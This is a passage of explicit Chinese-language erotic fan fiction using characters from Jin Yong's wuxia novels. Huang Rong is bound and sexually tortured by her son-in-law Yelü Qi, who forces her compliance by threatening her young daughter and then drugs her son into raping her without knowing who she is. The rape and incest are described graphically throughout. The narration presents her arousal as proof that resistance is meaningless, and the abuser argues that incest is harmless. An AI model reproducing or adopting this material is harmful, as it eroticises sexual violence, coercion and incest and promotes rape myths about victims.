字幕網- 每日更新 永久免費

話說郭靖鎮守襄陽已經三十年,蒙古大軍一直奈之不何,但這次不同,此次攻打的襄陽的蒙古大軍多達五十萬,襄陽城眼看就要不保,此時有一人卻偷偷入城要見耶律齊,而這人不是別人,乃是耶律齊的侄兒耶律邦,而且耶律邦還告訴耶律齊,自忽必烈當大汗後,不僅為耶律家平反,還任命他為平南侯,他還轉達忽必烈的詔命,隻要耶律齊殺了郭靖,他就是大蒙古的平南王!如此誘惑,耶律齊於是利欲熏心,設計殺了郭靖,但是他與耶律邦的書信卻不幸落入黃蓉手中,於是耶律齊先下手為強,囚禁了黃蓉,並且設下毒計,想取得郭破虜手上的武穆遺書!

  當晚,郭破虜被耶律齊叫去,及到了府中,耶律齊卻未露麵,隻由丐幫的人員獻上一杯茶,就退下去了。

  郭破虜啜著香氣撲鼻的茶水,苦苦等了許久,還不見耶律齊出現,心中奇怪,心想:“不是姐夫叫自己來的嗎,怎幺他卻還沒出來?”

  此刻,耶律齊卻正在地下的刑室內。氣質高雅端莊的郭靖之妻,自己的嶽母黃蓉,此刻已一絲不掛,她那豐腴美婦的成熟胴體配合著她臉上嫻雅的表情孕育出一種特別吸引人的魅力。

  她纖秀的手腕和白晰的足踝,都被鐵索緊緊綁住,赤裸裸的誘人嬌軀呈大字形橫臥在木案上,就像一頭待宰的羔羊。那婀娜的纖腰上方,一對豐盈挺聳的玉乳奇峰突起,而大張的一雙粉腿間,芳草茵茵,烏黑油亮的陰毛整齊柔順地貼著陰阜,紅潤的陰唇十分醒目。

  那嬌俏美麗的芙蓉玉麵,仿佛月下梨花,眼角淚痕猶濕,乍一看,好像微雨後的花朵,黛眉痛苦羞憤地緊鎖著,好像淡淡薄霧籠罩下的柳葉,耶律齊一見之下,骨頭就輕了四兩,他嘿嘿淫笑著湊過去,他敞著一件長袍,裏麵卻是一絲不掛,赤裸著結實的胸膛和累累的一團下體,一雙色眼緊盯著黃蓉的下體。

  黃蓉羞憤欲絕,可是雙腿卻無法並攏,由於掙紮,手腕和足踝處都隱隱沁出血絲。那連在丈夫麵前也不曾如此放浪無恥地打開過的秘穴,完全暴露在女婿耶律齊的麵前,而就在不久前,就是他殺死了自己的丈夫。

  黃蓉恨他入骨,可是小穴如此毫無保留地呈現在他麵前,覺得下體涼涼的,大腿根處,微感騷癢,好像他的眼睛就是一雙無形的魔手,正在撫弄自已的嫩穴,羞憤的感覺集中在下體嫩穴處,黃蓉的目光簡直要噴出火來,狠狠地瞪著耶律齊,不肯屈服的神情在她的俏臉上顯露無疑。

  耶律齊淫笑著伸出手去,輕輕一摸黃蓉大腿上溫膩的肌膚,黃蓉身子一顫,大腿上的肌肉猛地抽緊了,咬著牙怒喝道:“奸賊,不要碰我。”

  耶律齊嘿嘿地淫笑著,手指撚起幾根柔軟的陰毛,輕輕扯動著,黃蓉小穴上的大陰唇不禁因為些微的痛楚而抽動起來。耶律齊淫笑道:“嶽母息怒,你的小穴嬌豔紅潤,似乎嶽父大人不常賞玩呢,嗬嗬,嶽母正當虎狼之年,可曾寂寞過嗎? 這裏癢是不癢?”

  黃蓉雙頰飛紅,纖纖素手的十指捏得嚓嚓直響,顫聲道:“奸賊,無恥的惡賊,不管怎樣,我總是你的嶽母,你怎可如此對我?”

  耶律齊竟然正色道:“正因你是我的嶽母,嘿嘿,如此良田沃土,豈能遭蹋了?你們不是有句話,叫”肥水不落外人田“,如今襄陽城破在即,嶽母大人若是淪落成女奴,這嫩穴豐臀少不得要被那些村夫莽漢們大操特操,怎不叫我心疼?還是由女婿我來享受一番,總算沒有便宜外人,豈不是好?而且嶽母也可與芙兒團聚,不是更美!”

  黃蓉聽了他這幺無恥的話,隻氣得嬌軀亂顫,胸前一對粉乳玉兔,更是一陣搖晃,氣得噎聲道:“你……你……,你這無恥的畜生,你……你……”

  耶律齊對她的怒罵根本不當一回事,雙手大力揉搓著那對飽滿堅挺,捏起來既軟綿綿的,又甚有彈性的乳房,輕輕在乳頭上一彈,激得黃蓉的嬌軀一下子繃得緊了,纖腰也向上抬了一下,嘻嘻笑道:“嶽母,襄陽眼看就要落入我蒙古手中,嶽母冰雪聰明,為何此時卻想不開?”

  他蹲下去在黃蓉豐腴柔軟的下體試探地碰觸了幾下雙臀的臀肉和大腿間的腿肉,輕輕嗬了一口熱氣,黃蓉忍不住嬌呼一聲,隻覺得下體敏感的嫩穴一陣酥癢,縱是為人端莊嫻淑,是個十分規矩本份的女人,可是也禁不住生理上的變化,桃源溪穀逐漸濕潤起來。

  黃蓉感覺到了自已下體的變化,覺得自已太過無恥,怎能在這淫賊麵前,在這有著血海深仇的敵人麵前如此淫蕩?其實這些都是由不得本人可以做主的。

  就如那漢宮飛燕,懲治從宮外秘密抓來卻不肯相從自已的良家少年時,便令宮女一手持刀,一手為他套弄陽具,那少年明知一旦勃起,子孫根上就要挨上一刀,生死關頭,可是那玉莖還是搖頭擺尾,蘇醒過來,在纖纖玉手中蓬勃生長,寧可挨那一刀,純粹是生理反應,由不得自己作主罷了。

  這黃蓉雖嫁與郭靖已二十多年年了,和丈夫行房做愛已是架輕就熟,卻並不了解這些,仍以為隻有在心愛的男人麵前,為他情動之時才會如此,見自已竟然對仇人的玩弄產生情欲,芳心中真是又是淒苦自憐,又是怨恨羞恥。

  耶律齊看著黃蓉性感成熟、美豔絕倫的玉體,見她嫣紅的臉上羞憤難當的窘態,不禁哈哈大笑,欲念隨之狂漲,無恥地道:“嶽母看來也是饑渴日久了,既然嶽父大人如此不濟事,就讓女婿我來替嶽母解解癢吧。”

  黃蓉聽了這樣的話,隻氣得渾身亂抖,可是清清白白的身子毫無反抗之力地平躺在這裏,如何製止這禽獸施暴?兩行熱淚已然流了下來。

  耶律齊依然穿著長袍,卻不急著上馬,他從袋中拿出剪短了的兩枝野雞尾翎,興味十足地在黃蓉的嫩穴上輕輕搔動起來,天啊,一陣奇癢立即從小穴傳遍全身,使黃蓉的身體顧不得是暴露在一個不是丈夫的男人麵前,纖腰劇烈地挺動著,就像饑渴中求歡的深閨怨婦。

  她的紅潤小嘴急促地喘息呻吟著道:“啊……求求你……不要呀……嗯……好癢……”那不輕不重的搔弄使她下體奇癢無比,簡直比遭受酷刑還要難受,豐滿的臀部也上下顛動起來,雖然她是想避開耶律齊手中的雞翎,可是看起來卻是淫蕩無比。

  明明沒有人在插送她的小穴,可是這美豔的少婦豐臀顛聳,玉體輕搖,就像是正和一個看不見的人在縱體合歡。奇癢使黃蓉痛苦的眼淚都流了下來,她雖然不願在仇人麵前服軟,可是現在卻不得不一次次哀求他:“求你了……耶律齊,啊……呀……呀……女婿……求您,殺了……我吧,別……折磨……嗯……嗯……啊……我……”

  耶律齊眼見她反應如此強烈,更是樂不可支,又用雞翎去挑弄她的腳心,黃蓉笑又笑不出,哭又哭不得,俏臉通紅,小嘴裏胡亂地叫喊著,玉體顛送,就像一條被擲上岸的魚兒,掙紮著,可憐地哀求著。

  耶律齊眼見已經把她折磨得毫無反抗之力,嗬嗬笑著停下手,已經耗盡氣力的黃蓉立即酥軟了身子,大口地呼吸著,胸前玉乳、平坦的小腹急促地起伏著,那瑩潤的蜜穴已經沁出了滴滴淫露。

  耶律齊繞到黃蓉麵前,饑渴地吸吮著她柔軟的紅唇,舌頭想要探進她的小嘴裏,黃蓉有心反抗,可是想起剛剛所受到的酷刑,真是心有餘悸,他若是一刀殺了自已,倒也罷了,想不到這小小一根雞瓴可比刀劍還要厲害。

  不敢明白地反抗,隻有緊緊閉合著牙齒,不肯讓他的舌頭送進自已的嘴裏。

  耶律齊見她還不肯屈服,伸手在她濕漉漉的小穴裏掏了一把,黃蓉身子一震,“啊”地輕呼了一聲,耶律齊已趁機發力,頂開了她的齒縫,舌頭長驅直入,攪弄起她的香舌來。

  黃蓉悲歎一聲,雙唇被他緊緊壓著,香舌無力抗拒,隻得任憑舔弄。這俏王妃雖然不甘受辱,內心充滿了痛苦和悲憤,但是那香軟的雀舌,卻被耶律齊探進自已口中的舌頭攪弄吸吮著,無法反抗了。

  黃蓉風韻柔媚,體態撩人,但十分端莊賢淑,一向潔身自好,如今被個男人如此捉弄親吻,雖然明知他是不共戴天的仇敵,還是全身酸軟,頭暈目眩。

  她的心在痛苦中掙紮,身體卻毫無抗拒地承受著耶律齊的撫弄。這個英俊、健美的女婿盡管使她切齒痛恨,但不能否認的是,她羞窘地意識到身體在痛苦中已經感受到一些愉悅。

  耶律齊一邊深深地吸吻著她的小嘴,攪拌著她的香舌,一邊用手撫弄著她已堅挺的乳房,成熟美婦的乳房飽滿結實,渾圓挺翹,觸手滑膩柔軟,富有彈性。

  當黃蓉的雙乳充血張挺起來,一對嫩紅如同新剝雞頭肉似的可愛乳頭俏盈盈地豎立起來時,耶律齊已經充滿了勝利的喜悅,手掌沿著黃蓉光滑柔膩的身體曲線一路蜿蜒下滑,揉觸在她小肉包子似的肥美陰阜上。

  手指輕輕撚動著柔細的絨絨陰毛,手指探進那紅潤泥濘的細縫,豐腴的柔唇緩緩分開,一股火熱、嬌嫩的感覺傳來,那嫩穴裏已是甘霖普降,濕潤不堪,耶律齊欣喜地賞玩著這成熟婦人的嬌軀,高高在上的前丐幫幫主的美穴,手指有如佛陀拈花,輕撥細撚,挑逗得黃蓉嬌軀亂顫,下體酥癢難當,陰蒂不知羞恥地像一枚紅豆似的挺立了起來。

  黃蓉悲鳴一聲,她沒想到自已那幺痛恨眼前淩辱自已的仇人,而且自已素行端莊,絕不是一個淫蕩的女人,可是自己的身體卻這幺不爭氣,那堅挺的酥胸、泥濘的嫩穴簡直像是在向耶律齊發出了無聲的邀請,在向他表述自己對他的愛撫是多幺舒服。

  她痛苦自責,自怨自艾,可是嫩穴裏傳來的一波波強烈的蝕魂銷骨的酸癢快感,讓那原本聖潔的秘處控製了她的意識,她無聲地嬌喘著,嫵媚的眼睛水汪汪的,小嘴裏發出銷魂的呻吟,心裏雖然掙紮反抗著,可是身軀慵軟無力,隻能任憑擺布了。

  耶律齊得意地看著她的表現,手指剛剛在她的嫩穴裏抽動時,她豐滿的圓臀還掙紮著扭動,象征性地做著反抗,而現在,她的豐腴雙腿已經軟軟地癱在案上,成了砧上魚肉,任他屠宰了。

  他嗬嗬地笑著,什幺三貞九烈的女人,剝光了她的衣服,也就剝下了她的尊嚴和體麵,當你玩弄得她發出銷魂蝕骨的呻吟聲時,盡管她再怎幺不承認,她的身體都已拋棄了她多少年來根深蒂固的愛惡和理念。而且正由於她原本是個端莊、正派的女人,一個身份高貴、尊榮風光的一代大俠的妻子,一旦赤裸裸地躺在這裏,玉體橫陳,春潮泛濫,那種女兒媚態,也更加令人怦然心動。

  從小受到的禮教道德的培養難以抵禦成熟身體對魚水之歡的渴望,讓黃蓉的心中充滿絕望,她不肯讓自已冰清玉潔的身子被這仇人占有,強自提起精神,牙齒抵住舌根,就要 往下咬。

  耶律齊一直盯著她的神色,見她原已迷離、柔媚的俏臉忽然一整,立即伸出手去,掐住了她的雙頰,使她臉上肌肉一陣酸軟,無奈地鬆了口,她睜開一雙淚水漣漣的俏眼,淒苦中帶著仇恨的目光,死死逼視著耶律齊。

  耶律齊一手仍掐在她嫩頰上,一邊嘿嘿地笑道:“想死?嶽母您可別忘了,現在郭襄還和她姐姐住在一起,嶽母要小婿一箭姐妹雕嗎?”

  黃蓉猛然一震,驚駭地望著耶律齊,失聲道:“不!求你放過她,她還那幺小……”

  耶律齊笑了笑道:“那就要看你的啦,你若就此去死,嘿,你知道我會怎幺對付你?”他麵目猙獰地道:“我要把你赤身裸體,懸掛在城門上,讓天下人欣賞,你的貞操不但保不住,就連你的女兒們都要跟著你蒙羞,想清楚吧。”

  黃蓉想到那種場麵,不寒而悚,一臉堅決赴死的神色化作烏有,竟是不知所措,完全變成了一個楚楚可憐,柔弱可欺的美婦模樣。

  耶律齊站起身來,柔聲勸慰道:“嶽母,人活一世,草木一秋,我耶律齊把人世間的一切都當作狗屁,隻有自己歡樂才是好的,你這樣美麗,隻要好好從了我,我自然不會虧待你,何去何從,你是聰明人,不用我來教你吧?”

  黃蓉心亂如麻,又不想對不起死去的丈夫,又怕死了也會受到他無盡的淩辱,正神色惶乎間,耶律齊已經把下體貼到她的櫻唇上,命令道:“嶽母,快替女婿我含進去,讓我舒服了,你和你的襄兒就都可以安全無恙。”

  黃蓉俏眼下斂,眼見一條粗大的陽具就挺在自己嘴角邊,幾差毫厘就要碰到自已的嘴唇,不禁惡心地嚶嚀一聲,猛地轉過頭去。

  耶律齊扳過她的螓首,陰莖粗大的龜頭頂在她豐滿柔軟的嘴唇上,冷喝一聲道:“嶽母,你還是想不通?嘿,男人是用來幹什幺的?女人是用來幹什幺的?若不想自己難過,就放棄你的自尊和身份,再反抗,哼!”

  他冷森森的一聲冷哼,讓黃蓉猛地想起了他的威脅,想起了自已的幼女,身體一顫,緊閉的雙唇放鬆了一線,耶律齊心中一喜,伸出一根手指輕輕撐開嶽母的櫻唇,下體一挺,粗大的陽具就滑進去一半。

  嶽母的口腔柔軟滑膩,香軟的舌尖盡管竭力閃避,還是不時碰觸到他的陰莖,事情到了這種地步,黃蓉已經無法再重拾自尊,對他反抗了。

  耶律齊看到嶽母閉上了那雙明媚動人的俏眼,嘴裏也放鬆了,知道她為了女兒的安危和自己可能遭受的淩辱而屈服了,不禁嗬嗬大笑,雙手輕輕抱著她的腦袋,陰莖開始輕柔地抽送起來。

  他的陽具雖然粗大,比郭靖還要長了三寸,粗了兩分,可是耶律齊有心征服她,所以並沒有故意插到底令她難過,每次都隻插一半進去,感受她口腔的濕滑和柔軟。

  對方的身份是前丐幫幫主,武林第一美女,又是東邪的女兒,北俠的妻子,可是一個身份高貴的女人,心中那份得意和興奮真是難以描述,一想到她是自已妻子的母親,是自已的嶽母,那種亂倫的禁忌快感讓耶律齊首次體會到了有著親密關係的女人被自已淩辱的銷魂感覺。

  黃蓉初時尚羞窘不安,其實她真沒給男人吸吮過下體,不過在和女兒嘮些私房話時,倒是也聽芙兒說笑過此事,當時聽了臉紅心跳,心中也想過這羞人的事,隻是想不到小嘴第一次接觸男人的陽具,卻不是自已的丈夫。

  此刻無可奈何,黃蓉隻好紅著臉,閉著臉,暫時放下心中的憤怒和悲傷,口齒間感受著耶律齊陽具的火熱和堅挺,反正已要失身給他,莫再惹惱了他,連累了自已的孩子,豈不得不償失?

  此時,郭破虜已在耶律齊授意安排下,被耶律邦領著已經奔向刑房,這位少年郎喝了兩杯加了料的香茗,此刻隻覺下腹又熱又脹,心猿意馬,又不知為何如此,走起路來生怕給人看見,太不雅觀,隻好微躬著身子,十分狼狽。

  郭破虜心中奇怪,不知那管家因何把自已引向地下刑室,這種刑室是用來關押處置捉來的蒙古奸細的,可是姐夫要自己到這裏來幹什幺?

  郭破虜跟了進去。走進光線陰暗的牢房,見到一間敞著門的牢房內點著兩支火把,走到門口,他不禁呆住了。

  隻見囚室中一方長案上躺著一具赤裸的女體,肌膚白晰,曲線玲瓏,雙手雙腳被縛在四角的支柱上,毫不設防的赤裸嬌軀上一對豐盈的嫩乳嬌嫩動人,驕傲地挺聳著,那豐腴雙腿間的秘處在火光下隱隱約約,隱隱泛著汁液的反光,真是一見銷魂。

  而耶律齊正站在那美麗女人的麵前,敞開的長袍遮住了那女人的麵孔,可是從耶律齊不斷向前挺動的下體可以想像得到那女人正為耶律齊口交。郭破虜一看之下,胯下的陽物更形龐大,漲得簡直要爆炸了。

  他一次趁父親不注意,偷偷奸淫了一個被俘虜的蒙古將領的美麗妻子,料想耶律齊正在以暴力占有這樣一個美俘虜,不禁咽了口唾液,心中暗想:“他媽的,怎幺我就沒捉過這樣的俘虜?”

  耶律齊見他來了,向他微微地一笑,伸出一根食指豎到嘴邊,示意他不要出聲,然後又指了指縛在案上的美豔女體,做了個邀請的手勢,示意他一起來。

  郭破虜不由一呆,他年少輕狂,和一些兵士逛花街柳巷時也曾玩過“一龍二鳳”,“雙龍搶珠”的荒唐遊戲,但眼前的可是自己的姐夫,他雖然欲焰高漲,可是卻遲疑著未敢上前。

  耶律齊向他笑笑,又示意了一下,郭破虜的下體實在漲得難受,心中欲火焚心,隻想按住一個女人,好好的泄泄火,見此光景,心想:左右不過一個俘虜,既然姐夫不在意,就拿她解解饞吧,自已也實在是忍不住了。

  想到這裏,立即脫掉自已的衣服,露出服了春藥,顯得更形粗大,幾乎已比得上耶律齊的大肉棒,貪婪地看了看那年輕女人嫩白豐聳、不斷起伏的酥胸,硬挺挺的陽具不由更加肉緊。

  耶律齊見到他這般模樣,想到馬上就可以看到一出母子亂倫的好戲,心中更加興奮,陽具漲得更加粗大,在黃蓉小嘴中抽送的速度和力度馬上加快起來。

  黃蓉閉著眼睛,感覺到耶律齊陽具在自己口中的堅挺結實,受辱的屈辱感和強壯異性對自已的占有快感交織在心頭,一種是內心深處的悲憤和無耐,一種是肉體上誠實的興奮的反應,心中的悲憤作用在肉體上,使她的肌肉不由自主地收緊,做著無形的反抗,而肉體的快感又使她的內心迷惘混亂,沉淪不醒。

  這綁人的木案做得十分的合理,呈人字形,大張的雙腿是懸空的,此刻郭破虜已經走到了她的雙腿之間,黃蓉的小穴好像散發著一種女性特有的異香和吸力,郭破虜躍躍欲試的陽具已經自動向著那嬌美動人的嫩穴搖頭晃腦著。

  郭破虜再也忍不住了,他猛地往前一趴,雙手一下子握住了那對顫顫巍巍地跳躍著的白嫩乳球,下體的陽具對準了那濕漉漉的柔軟嫩穴“噗”地一下紮了進去。

  黃蓉正被耶律齊抱著腦袋口交著,酥癢的下體忽然一陣快感傳來,感覺到一根粗而有力地肉棒一下子插了進來,使那酥癢空虛的嫩穴一下子充實起來,忍不住“呃”了一聲,幾乎暈眩過去,緊跟著一雙顫抖的大手握緊了自已柔嫩豐滿的乳房,雖然粗魯有力,可是此刻卻比溫柔地輕撚慢揉要解渴得多,她的嬌軀一下子興奮到了極點。

  可是黃蓉也立刻意識到又一個人加入了奸淫自已的行列,剛剛雖然受到耶律齊的無恥玩弄,可是畢竟隻有兩個人,鴕鳥心態使她的羞恥感和道德感還能壓製得住,這一下居然又加入了一個男人,心理上的感覺好像自已的醜行一下子暴露在天下人的麵前,她又羞又窘,下體又忍不住掙紮扭動起來,極力向上縮著屁股,想讓那人的陽具拔出來。

  她還不知道那是她的親兒子,是她懷胎十月生下來的郭家血脈,否則更要羞憤欲死了。

  她一邊極力向上提著身子,一邊想要抬起頭來,看清是誰,可是耶律齊此刻怎會讓她如意?雙手把緊了她的腦袋,把她的臉夾在胯間,粗大的陽具奮力地插進她的小嘴,長長的觸到了喉嚨,讓她產生了嘔吐的感覺。

  她的雙手雙腳都被綁住,想要抽回身子,隻有利用腰和小腹的力量,這一抽緊,下體的嫩穴更加緊密了,郭破虜隻覺得那嫩穴滑膩柔軟,充滿了彈性,這一抽緊,豐腴的嫩穴裹緊了自已的龜頭,夾得緊緊的,好像要把他的肉棒推出來,可是那種緊密度又像是要把它含進去,火熱柔嫩的感覺使下體粗脹了很久的肉棒一下子得以釋放,好像融化般的快感迅速傳來。

  郭破虜亢奮地呻吟一聲,雙手捏緊了母親的豐乳,粗挺的肉棒在她的嫩穴裏忘情地抽送起來。

  黃蓉雖然又羞又急,可是下體那根可惡的肉棒正是救火的先鋒,這一陣狂抽猛插,下體的酥癢感得到解決,竟使玉體嚐受到了從未有過的酣暢快感。

  她“呃……”地喉中發出一聲顫抖的呻吟,再也無法抵製肉體的反應,肉縫中淫水淋漓,胸前渾圓堅挺的雙乳被捏弄著,又是痛楚,又是舒服,與小穴裏傳來的一波波快感連成一氣,極度的興奮使她的欲念也不由高熾起來。

  這樣的玩弄她如何能夠禁受,理智已經徹底被情欲所壓倒,她的翹臀竟然不由自主地輕微而不引人注目地迎合起來。今天,黃蓉豐腴的良田才算是得到了徹底的開發,柔美的陰道像少女般緊窄,緊緊環繞著下體的那根大肉棒。

  口中那根與下體相比不遑稍讓的巨大肉棒依然插弄著她的小嘴,大開大闔的動作時不時地插進她的咽喉,可是身體上傳來的極度快感,使喉中的不適感已經蕩然無存,口齒感受著口中陽具的粗硬和長度,使她的腦海中可以清晰地幻現出正在下體肆虐的大肉棒的樣子,貞潔的成熟美婦已經暫時失去了清醒的意識,陶醉在自已的親兒子的操弄快感中。

  也許她清醒過來時會難以自處,但至少現在,男人那硬中帶軟,任何異物都無法替代的插入感覺已經充斥了她的全身,挑起了她全部的情欲。

  郭破虜為了加快抽送的速度,站直了身子,鬆開了緊握著的一對椒乳,黃蓉隻覺得原本充實的胸前忽然變得空蕩蕩的,緊跟著一雙有力的手握緊了她懸在空中的線條優美的小腿……然後滑到柔嫩豐腴的大腿上部,一下子抓緊了她的大腿根部。

  黃蓉結實的大腿內側的嫩肉深陷進那手指中,略有些痛,可是更多的是興奮的充實感,下體的陽具抽送的更加有力了,次次到底,陰囊“啪~~啪~~”地打在她的大腿根上,對方的陰毛一下下摩擦著她陰唇的嫩肉,黃蓉幾乎要興奮得暈厥過去。

  郭破虜一邊用盡全力地操弄著對此還毫不知情的母親的嫩穴,一邊抓緊了她彈性驚人,滑如凝脂的股肉,施虐的快感讓他幾近於瘋狂。身下的女人被他抓著豐盈的臀部也稍稍提了起來,臀部曲線弧圓,臀肉緊繃繃的,姣好之極。

  要知道黃蓉雖然已經年過四十,但也是一個女人極度成熟的美豔時刻,那雙勻稱豐腴的大腿,渾圓如玉柱,沒有一絲贅肉,身材凹凸有致,雖然已經經過二十年的性愛生活,可是那小穴仍顏色紅潤,芳草柔順,比起稚嫩少女,別有一番風韻。

  黃蓉柔若無骨的胴體被兒子操弄得波瀾起伏,胸前一對玉乳搖晃著幻化出迷人的波浪,那俏麗的臉蛋上布滿了紅暈,曲線優美的身體被兩個放蕩的淫賊玩弄得泛起了桃紅色。

  耶律齊眼見她嬌美的胴體煥發出性感的色暈,已經不滿足於隻在她的口中抽插,他拔出陽具,走到郭破虜身邊,說:“來,我們換一換,你去玩她的小嘴。”

  此時郭破虜被淫藥藥力發作而漲起的大肉棒一下子像步入天堂一般,正在興奮之中,他現在不想有絲毫的停頓,可是畢竟胯下的美人是耶律齊的俘虜,無奈依依不舍地從那柔嫩火熱的小穴裏“啵”地一聲抽出自已的陽具,急不可耐地繞到前麵去,那欲火燒紅的雙瞳一下子碰到了黃蓉的俏臉。

  那俏麗嫵媚、麗而不妖的美麗麵孔是那幺熟悉,郭破虜如同被電擊了一下,駭然驚叫一聲:“娘親?”

  黃蓉紅潤的小嘴被抽送得又酸又麻,好不容易可以喘口氣,正張著小嘴急促地喘息著,嘴角掛著被耶律齊抽送帶來的一絲唾液,樣子十分淫靡。

  忽然聽到了熟悉的聲音,而且驚叫自已“娘親”,她愕然睜大一雙迷離的媚眼,隻覺得好似一盆冷水從頭上潑下來,整個人都懵住了,身體不由自主打擺子似的哆嗦了起來,臉色變得慘白,難以言喻的極度痛苦和羞臊感讓她感到無地自容,恨不得找條地縫,一下子跳下去。

  眼前那赤裸著身子,挺著一條淫液淋漓,鎧亮通紅的大肉棒的男人,可不正是自已的親兒子郭破虜?原來方才在自已的小穴裏插進拔出,極盡玩弄,而讓自已感到極度愉快的那個東西是自已親兒子的陽具。

  天啊!黃蓉一聲慘叫,痛苦地一聲呻吟,上身猛地挺了起來,雙手手腕深陷進鐵索裏鮮血直流。

  她竟渾然未覺,死死地瞪著郭破虜,她可不知郭破虜也蒙在鼓裏,以為他早有預謀,和耶律齊合起來做下這逆倫的醜事,恨得銀牙緊咬,嘶叫著道:“你、你……你這個畜生,呃……”極度的悲憤,使她一下子昏迷了過去。

  耶律齊這個始作俑者,看著這有趣的一幕,哈哈大笑,他望著昏迷中酥胸起伏的玉體,那雪白豐滿如同新雪乍降的胸脯上,尖挺飽滿的一對乳房如同一對倒扣在那兒的玉脂球,頂端的蓓蕾泛著淡紅的光澤,雖然在昏迷之中,可是當他那硬梆梆的大肉棒一下子沒入豐腴雙腿間那一叢烏黑柔軟的絨毛中時,那種嫩穴陰道裏陰肉痙攣,緊密纏繞的快感還是一 下子傳了上來。

  他一邊抓著黃蓉的光滑的大腿,固定住她的臀部,盡情地抽送,一邊對矗著直挺挺的大雞巴,進退不得呆立在那兒的郭破虜道:“破虜,美人在眼,為何還在遲疑?”

  郭破虜紅著眼睛怒道:“你、你怎幺可以做這種事?她是我的、我的……”

  他吃吃地,實在羞於說出“親母親”三個字。

  耶律齊冷笑一聲道:“破虜,縱然她是你的母親那又怎幺樣?剛剛你不是操得飄飄欲仙?你不說我不說,有誰會知道嗎?”他一邊挺送著身子,把郭破虜刺激得欲火高漲,一邊發表著他的長篇謬論。

  “如果你根本不認識她,還會感到難堪嗎?所差者不過是投胎在同一個家庭而已,破虜,人生一世,不過是草木一秋,青春年華,轉眼即逝,管她是什幺人,隻要自已自在就好。”

  耶律齊抬著黃蓉的一雙粉潤的玉腿,呻吟道:“啊,好舒服,真是女人中的女人,她的身體太棒了,”一邊又對郭破虜說:“現在你錯也已經錯了,就算你現在不幹,你以為她就會放過你嗎?想想看,她是你的母親,是從小看著你長大的至親,如果讓她臣服在你的腳下,做你的性奴,該是何等的愜意?人生在世,能享受別人不能、也不敢享受的快樂,枉此生也。”

  郭破虜望著母親那滿含春意的俏臉,那嫵媚白晰的臉蛋上豔光四射,紅潤的小嘴吐氣若蘭,微張著的紅唇露出一點潔白的牙齒,口齒微啟,像一朵含苞的花瓣,他的雞巴忍不住跳了跳,想著插進她的小嘴裏的銷魂感覺,那母子禁忌的交合,別人一生也不能享受到的極樂,他的欲火高熾,如果不是心中還有著最後一絲理智和顧忌,早就撲上去大幹特幹了。

  耶律齊雙手托起黃蓉豐滿雪白的大屁股,那柔軟而有彈性的臀肉使他感到更大的快感,黃蓉的臀部被他托高,豐腴蜜桃兒似的嫩穴凸了出來,那粉紅的嫩縫隨著他肉棒的進出蠕動著,幾滴晶瑩的花露沾在柔順的陰毛上,嫩穴裏甜甜膩膩的感覺讓他魂飛魄散。在郭破虜的麵前奸淫他的母親,自己的嶽母黃蓉,使他越來越亢奮刺激。

  昏迷中的黃蓉粉潤柔軟的豐臀被他的操幹插得一沉一沉的,可是立即又被耶律齊一雙長而有力的手托起來,黃蓉的粉臀開始無意識地扭動著,小嘴裏發出饑渴的喘息呻吟,耶律齊亢奮地大叫一聲,猛地向前一挺,粗長的肉棒“撲” 地一下使勁插到盡頭,力大得連陷於昏迷中的黃蓉也禁不住發出一聲“呃”地呻吟。

  那肉棒忽然漲大,將熾熱的精液狂射進黃蓉的陰道深處,耶律齊一邊突突地射著精,一邊興奮地狂叫:“好快活,嶽母,我好快活,女婿給你了,啊,我全射進你的身體了,好嶽母……好美的嫩穴……”

  郭破虜目瞪口呆地看著這銷魂的場麵,下體漲得極為難受,聽到耶律齊一邊叫著“嶽母”,一麵在母親的豐腴柔穴間操弄,立時想起了自已的肉棒剛剛在那裏抽插的快感,他不禁呻吟著伸手自已套弄起陽具來,如果再不能得到發泄,他那裏真要痛苦地爆炸了。

  耶律齊在自已嶽母上發泄完了獸欲,滿足地抽出有些發軟的陽具,讚道:“嶽母的身體真是令人銷魂蝕骨,嗬嗬嗬,好舒服呀……”他特意加重“嶽母”二字的語氣,以提醒郭破虜自已也是在亂倫,削弱他心中的罪惡感,係好長袍,向郭破虜一笑道:“我先上去了,破虜,機會難得呀,你如果能徹底占有她,讓她臣服於你,豈不一雙兩好?如果遲疑不前,嘿,她若醒了一樣放不過你,破虜,三思啊。而且我可以保證,襄陽城破之後,你可以帶你娘親遠走高飛,過那雙宿雙棲的日子”說著施施然走出囚室,還特地拉上了台階上的大門。

  “砰!”一聲響,鐵門沉重地關上了,地室中隻剩下了這母子二人。

  郭破虜顫抖著望向母親的嬌軀,她一對豐腴渾圓的白嫩大腿張得開開的,可以清楚地看到乳白色的精液從她的小穴裏緩緩地滲出來,那纖腰豐乳,長腿肥臀此刻在這個欲火焚心的浪蕩子眼裏超過了任何一個女人的吸引力。

  屋裏靜靜的,隻聽到他自己沉重的呼吸聲。再也沒有別人了,這個想法使郭破虜心中的罪惡感一鬆,他慢慢走近自已母親的玉體,伸出顫抖的手輕輕撫摸了她香軟細潤的乳頭,然後癡癡地看著她那對飽滿高聳的玉乳,忍不住張開大手緊緊握下去。

  “呃~~~~”,郭破虜的喉中發出一聲銷魂的呻吟,他忍不住一手握緊了自已腫脹不堪的陽具,一手捏著母親的一隻豪乳,俯下身去,張嘴叼住了她的一個奶頭吮咂起來。

  那女人的淡淡幽香,異樣的乳肉口感從他的舌尖傳到腦海中,是那幺美妙動人。昏迷中的黃蓉敏感的胴體不堪挑逗,一雙蛾眉微微地蹙著,粉腮通紅,玉體微顫。

  她的小嘴張合著呻吟著,昵喃著令人銷魂的柔音,郭破虜看著她那紅潤的小嘴,忍不住撲過去,抱住母親的俏臉,顫抖的雙唇貼上了她紅潤的香唇,那嘴唇是那幺柔軟,像一團火似的點燃了他體內亂倫的狂焰。

  他騰身而起,一切禁忌都在欲火的燃燒下被拋之腦後,他握著粗脹的肉莖,輕輕頂在母親柔軟的嘴唇上,龜頭碰到母親無力地閉合著的牙齒,兩片薄唇搭在渾圓的龜頭上,使他激動得渾身發抖。

  他輕輕叫著:“娘親,你好美,好美,我真是愛死你了,我要你,娘親,把你的紅唇給我吧,讓我插進去。”他的呼喚似乎起了作用,黃蓉的嘴唇微微張開了些,郭破虜興奮地向前一挺,粘著淫液的陰莖順利地滑過母親的玉齒,插進了她溫暖香滑的口腔。

  郭破虜一陣興奮的戰栗,低下頭望著自已那大肉棒一寸一寸地沒進母親的紅唇,天啊,那是怎樣的感覺啊?盡管還未開始抽插,郭破虜已經感到了極度的快樂,那種近親之間禁忌交歡的快感強烈刺激著他的身心。

